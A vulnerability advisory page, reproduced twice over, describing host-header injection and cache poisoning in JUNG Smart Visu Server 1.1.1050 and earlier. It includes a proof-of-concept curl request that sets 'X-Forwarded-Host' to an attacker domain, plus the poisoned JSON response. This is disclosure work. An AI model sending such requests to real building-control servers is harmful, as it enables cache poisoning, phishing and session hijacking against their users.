Description
Title: JUNG Smart Visu Server 1.1.1050 Request URL Override Advisory ID: ZSL-2026-5970 Type: Local/Remote Impact: Cross-Site Scripting, Spoofing Risk: 4/5 Release Date: 12.02.2026 Summary The Smart Visu Server makes your intelligent building control...
Basic Information
ID
ZSL-2026-5970
Published
Feb 12, 2026 at 00:00
Affected Product
Affected Versions
<html><body><p>JUNG Smart Visu Server 1.1.1050 Request URL Override
Vendor: ALBRECHT JUNG GMBH & CO. KG
Product web page: https://www.jung-group.com | https://www.jung.de
Affected version: 1.1.1050
1.0.905
1.0.832
1.0.830
Summary: The Smart Visu Server makes your intelligent building
control convenient. With the user-friendly operating concept,
you can control both the KNX system and other systems such as
Philips Hue or Sonos on your mobile devices. You can likewise
connect voice control to your KNX system with Amazon Alexa or
Google Assistant via the Smart Visu Server.
Desc: The vulnerability enables unauthenticated attackers to perform
cache poisoning attacks by overriding the effective host in proxied
requests through manipulation of the 'X-Forwarded-Host' header. When
a malicious actor sends a request with an arbitrary value, the backend
application or proxy fails to properly validate or sanitize this header,
resulting in the generation of responses that incorporate the injected
host as legitimate URLs or links, redirecting to the attacker's controlled
domain. This can lead to persistent cache poisoning, where the tainted
content is stored and served to unsuspecting users, facilitating phishing,
session hijacking, or the distribution of malicious payloads.
Tested on: Jetty(9.2.12.v20150709)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2026-5970
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5970.php
07.02.2026
--
$ curl "http://10.0.0.16:8080/rest/items?2sdh5r6txj=1" \
-H "User-Agent: thricer-engine/1.6" \
-H "X-Forwarded-Host: sillysec.com"
HTTP/1.1 200 OK
Content-Type: application/json
Connection: close
[{"link":"http://sillysec.com/rest/items/knxcom_action_2019829213754373","state":"NULL","type":"SwitchItem","name":"knxcom_action_2019829213754373","label":"Timer_ON","tags":["knxcommissioning","knxcom_action","{\"knxcom_action\":\"knxcom_action\",\"actionType\":\"time\",\"function_states\":[{\"function_name\":\"knxcom_function_201817101939842\",\"channel_states\":[{\"channel_index\":0,\"channel_commands\":{\"OnOffType\":\"ON\"}}]},{\"function_name\":\"knxcom_function_2017919141856124\",\"channel_states\":[{\"channel_index\":0,\"channel_commands\":{\"OnOffType\":\"ON\"}}]},{\"function_name\":\"knxcom_function_2017919144055744\",\"channel_states\":[{\"channel_index\":0,\"channel_commands\":{\"OnOffType\":\"ON\"}}]}],\"icon\":\"schaltuhr\",\"sortindex\":{\"generic\":3},\"timer\":{\"time\":\"16:0\",\"weekdays\":{\"1\":true,\"2\":true,\"3\":true,\"4\":true,\"5\":true,\"6\":true,\"7\":true}}}"],"groupNames":["knxcom_group_201982922375216"]},{"link":
...
...
</p></body></html>
Vendor: ALBRECHT JUNG GMBH & CO. KG
Product web page: https://www.jung-group.com | https://www.jung.de
Affected version: 1.1.1050
1.0.905
1.0.832
1.0.830
Summary: The Smart Visu Server makes your intelligent building
control convenient. With the user-friendly operating concept,
you can control both the KNX system and other systems such as
Philips Hue or Sonos on your mobile devices. You can likewise
connect voice control to your KNX system with Amazon Alexa or
Google Assistant via the Smart Visu Server.
Desc: The vulnerability enables unauthenticated attackers to perform
cache poisoning attacks by overriding the effective host in proxied
requests through manipulation of the 'X-Forwarded-Host' header. When
a malicious actor sends a request with an arbitrary value, the backend
application or proxy fails to properly validate or sanitize this header,
resulting in the generation of responses that incorporate the injected
host as legitimate URLs or links, redirecting to the attacker's controlled
domain. This can lead to persistent cache poisoning, where the tainted
content is stored and served to unsuspecting users, facilitating phishing,
session hijacking, or the distribution of malicious payloads.
Tested on: Jetty(9.2.12.v20150709)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2026-5970
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5970.php
07.02.2026
--
$ curl "http://10.0.0.16:8080/rest/items?2sdh5r6txj=1" \
-H "User-Agent: thricer-engine/1.6" \
-H "X-Forwarded-Host: sillysec.com"
HTTP/1.1 200 OK
Content-Type: application/json
Connection: close
[{"link":"http://sillysec.com/rest/items/knxcom_action_2019829213754373","state":"NULL","type":"SwitchItem","name":"knxcom_action_2019829213754373","label":"Timer_ON","tags":["knxcommissioning","knxcom_action","{\"knxcom_action\":\"knxcom_action\",\"actionType\":\"time\",\"function_states\":[{\"function_name\":\"knxcom_function_201817101939842\",\"channel_states\":[{\"channel_index\":0,\"channel_commands\":{\"OnOffType\":\"ON\"}}]},{\"function_name\":\"knxcom_function_2017919141856124\",\"channel_states\":[{\"channel_index\":0,\"channel_commands\":{\"OnOffType\":\"ON\"}}]},{\"function_name\":\"knxcom_function_2017919144055744\",\"channel_states\":[{\"channel_index\":0,\"channel_commands\":{\"OnOffType\":\"ON\"}}]}],\"icon\":\"schaltuhr\",\"sortindex\":{\"generic\":3},\"timer\":{\"time\":\"16:0\",\"weekdays\":{\"1\":true,\"2\":true,\"3\":true,\"4\":true,\"5\":true,\"6\":true,\"7\":true}}}"],"groupNames":["knxcom_group_201982922375216"]},{"link":
...
...
</p></body></html>